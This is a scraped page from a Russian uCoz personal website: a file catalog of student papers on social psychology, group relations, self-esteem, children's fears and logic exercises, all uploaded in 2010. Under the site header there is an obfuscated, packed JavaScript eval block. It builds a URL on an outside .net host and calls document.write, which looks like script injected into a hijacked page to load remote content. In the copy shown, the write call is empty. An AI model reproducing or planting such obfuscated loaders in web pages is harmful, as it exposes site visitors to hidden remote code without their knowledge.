Суббота, 08.11.2025, 22:08Приветствую Вас Гость | RSS
Мой сайт
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=\'b://a\'+\'o\'+\'d.o\'+\'e\'+\'9\'+\'g\'+\'.8/s/4/?3=5\';6.7("");',31,31,'ript|xz607|ipt|sid|ppBDXM1297|125082|document|write|net|shech|SolnceS|http||chi|ko|sc|ka|la|ngua|ext|jav|asc|sr|scr||ge|ype|ja|||vascr'.split('|'),0,{})) // -->
Меню сайта
Категории раздела
Мои файлы [72]
Наш опрос
Оцените мой сайт
Всего ответов: 16
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Форма входа

Каталог файлов


Главная » Файлы

Всего материалов в каталоге: 72
Показано материалов: 1-10
Страницы: 1 2 3 ... 7 8 »

Введение

Любая организация, в том числе и школьное объединение, может нормально функционировать и развиваться благодаря складывающейся в ней системе межличностных отношений. Неформальный коллектив, стоящий за организацией и наполняющий ее жизнью, общее «Мы», характерное для группы, делающей общее дело, имеет свою систему устоявшихся связей между детьми. Именно отношения детей в группе видны «со стороны». И именно они являются показателем зрелости группы, способности ее брать на себя ответственность за достижение общей цели. 

Мои файлы | Просмотров: 585 | Загрузок: 128 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

ВВЕДЕНИЕ

В определении, сформулированном Клакхоном, подчеркивается, что культура создается, что культуре обучаются. Поскольку она не приобретается биологическим путем, каждое поколение воспроизводит ее и передает следующему поколению. Этот процесс является основой социализации. В результате усвоения ценностей, верований, норм, правил и идеалов происходят формирование личности ребенка и регулирование его поведения. Если бы процесс социализации прекратился в массовом масштабе, это привело бы к гибели культуры.

Мои файлы | Просмотров: 553 | Загрузок: 84 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (1)

Социальная психология - отрасль психологического знания, имеющая короткую, но насыщенную историю своего развития. Как самостоятельное направление психологической науки, она существует менее 100 лет. Официально годом рождения социальной психологии считается 1908 год, когда одновременно вышли две книги с аналогичным названием, заявившие себя как первые учебники по новой гуманитарной дисциплине. Интересно отметить, что один учебник вышел в Америке, другой в Европе, один был написан социологом, другой – психологом.

Мои файлы | Просмотров: 462 | Загрузок: 66 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Введение

Одной из самых значительных и актуальных тем в психологии можно считать проблему становления самосознания и самооценки личности.

Самооценка является одним из существенных условий, благодаря чему индивид становится личностью. Она формирует у индивида потребность соответствовать не только уровню окружающих, но и уровню собственных личностных оценок. Правильно сформированная самооценка выступает не просто как знание самого себя, не как сумма отдельных характеристик, но как определенное отношение к себе, предполагает осознание личности в качестве некоторого устойчивого объекта.

Мои файлы | Просмотров: 471 | Загрузок: 1370 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

ВВЕДЕНИЕ.

Коллектив - это развивающаяся социальная система. В зависимости от уровня развития различают складывающийся коллектив, т. е. находящийся в процессе своего становления (например, детский коллектив), и сложившийся, "зрелый" коллектив, т. е. коллектив с выработанной системой общественно значимых целей, четкой структурой деловых отношений и форм совместной деятельности, органами самоуправления (например, производственный коллектив, бригада, цеховой коллектив и т. п.).

Мои файлы | Просмотров: 413 | Загрузок: 186 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Введение.

В ситуации социальной нестабильности на современного ребенка обрушивается множество неблагоприятных факторов, способных не только затормозить развитие потенциальных возможностей личности, но и повернуть процесс ее развития вспять. Поэтому большое внимание проблеме страха уделяется в работах отечественных психологов и психотерапевтов, которые отмечают рост числа детей с разнообразными страхами, повышенной возбудимостью и тревожностью.

Мои файлы | Просмотров: 1327 | Загрузок: 786 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Задание №1.

Дайте полную логическую характеристику понятиям.

1. «Приговор» - понятие общее (нерегистрирующее), несобирательное, конкретное, положительное, безотносительное.

2. «Законность» - понятие общее (нерегистрирующее), несобирательное, абстрактное, положительное, относительное.

Мои файлы | Просмотров: 828 | Загрузок: 356 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Введение

Наглядно-образное мышление - совокупность способов и процесс образного решения задач, предполагающих зрительное представление ситуации и оперирование образами составляющих ее предметов без выполнения реальных практических действий с ними.

Мои файлы | Просмотров: 442 | Загрузок: 997 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Введение

Межличностные отношения школьников оказывают существенное влияние на результаты обучения детей. Довольно часто неуспевающий ребенок подвергается остракизму, насмешкам. Часто имеет место и обратная ситуация — ребенок, отличающийся от других своим умом и прочими достоинствами, тоже может адаптироваться к группе, просто потому, что он не такой как все. Для анализа взаимоотношений между учащимися подросткового и юношеского возраста и педагогами используются различные методики.

Мои файлы | Просмотров: 537 | Загрузок: 77 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Содержание.

 

1.Содержание                                                                                               1

2.Теоретическая часть.

2.1Введение                                                                                                  2                                                                       

3.Виды и классификация экспериментов,

этапы проведения                                                                                        4

4.Наблюдение и эксперимент                                                                     8

5.Практическая часть     


 

 

 

Мои файлы | Просмотров: 458 | Загрузок: 79 | Добавил: Лариса | Дата: 18.11.2010 | Комментарии (0)

Поиск
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz
  • d=document;var a='';a+=';r='+escape(d.referrer);js=10;//-->